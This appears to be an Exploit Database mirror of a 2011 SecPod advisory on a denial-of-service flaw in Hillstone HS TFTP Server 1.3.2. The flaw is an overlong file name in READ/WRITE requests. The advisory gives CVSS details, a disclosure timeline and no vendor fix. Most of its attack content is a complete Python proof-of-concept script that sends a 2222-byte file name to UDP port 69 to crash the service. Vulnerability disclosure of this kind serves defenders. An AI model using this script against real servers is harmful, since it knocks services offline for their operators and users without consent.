Hillstone Software HS TFTP Server 1.3.2 – Denial of Service

• Exploit Database
• 121 阅读

• 作者： SecPod Research
  日期： 2011-12-02
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18188/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132

  ############################################################################## # Title : Hillstone Software HS TFTP Server Denial Of Service Vulnerability # Author: Prabhu S Angadi from SecPod Technologies (www.secpod.com) # Vendor: http://www.hillstone-software.com/hs_tftp_details.htm # Advisory: http://secpod.org/blog/?p=419 # http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt # http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py # Version : Hillstone Software HS TFTP 1.3.2 # Date: 02/12/2011 ##############################################################################   SecPod ID: 1031 21/09/2011 Issue Discovered 04/10/2011 Vendor Notified No Response from Vendor 02/12/2011 Advisory Released     Class: Denial Of ServiceSeverity: Medium     Overview: --------- Hillstone Software HS TFTP Server version 1.3.2 is prone to a denial of service vulnerability.     Technical Description: ---------------------- The vulnerability is caused due to improper validation of WRITE/READ Request Parameter containing long file name, which allows remote attackers to crash the service.     Impact: -------- Successful exploitation could allow an attacker to cause denial of service condition.     Affected Software: ------------------ Hillstone Software HS TFTP 1.3.2     Tested on: ----------- Hillstone Software HS TFTP 1.3.2 on Windows XP SP3 & Win 7. Older versions might be affected.     References: ----------- http://secpod.org/blog/?p=419 http://www.hillstone-software.com/index.htm http://www.hillstone-software.com/hs_tftp_details.htm http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py     Proof of Concept: ---------------- http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py     Solution: ---------- Not available     Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR= NETWORK ACCESS_COMPLEXITY= LOW AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT= PARTIAL EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL= UNAVAILABLE REPORT_CONFIDENCE= CONFIRMED CVSS Base Score= 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P) Risk factor= Medium     POC : ======   import socket,sys,time   port = 69 target = raw_input("Enter host/target ip address: ")   if not target: print "Host/Target IP Address is not specified" sys.exit(1)   print "you entered ", target   try: socket.inet_aton(target) except socket.error: print "Invalid IP address found ..." sys.exit(1)   try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1)   ## File name >= 222 length leads to crash exploit = "\x90" * 2222   mode = "binary" print "File name WRITE/READ crash"   ## WRITE command = \x00\x02 data = "\x00\x02" + exploit + "\0" + mode + "\0"   ## READ command = \x00\x01 ## data = "\x00\x01" + exploit + "\0" + mode + "\0"   sock.sendto(data, (target, port)) time.sleep(2) sock.close() try: sock.connect() except: print "Remote TFTP server port is down..." sys.exit(1)